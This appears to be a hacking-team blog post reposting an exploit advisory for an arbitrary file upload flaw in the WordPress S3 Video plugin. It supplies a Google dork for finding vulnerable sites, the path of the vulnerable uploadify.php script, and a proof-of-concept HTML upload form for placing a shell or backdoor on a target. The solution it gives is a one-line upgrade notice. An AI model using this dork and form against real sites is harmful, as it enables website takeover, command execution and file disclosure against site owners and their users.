WordPress Plugins S3 Video Remote Shell Upload


#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulrnerability : 
/wp-content/plugins/s3-video/includes/uploadify.php

Description : 
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:
Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>

Shell Path : Here !!


3xploi7 Team

0 Response to "WordPress Plugins S3 Video Remote Shell Upload"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel


Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya

Simak Update Artikel menarik disini, Stay toon !! 3xploi7.com
Jangan sampai Terlewatkan.
 • Join Grup Team : 
— Facebook Grup ( 1.973 Anggota )
 Line Square 


 • Update Konten Unik Lainnya di : 
 Instagram
— Twitter

 • Tonton video kami di : 

 Youtube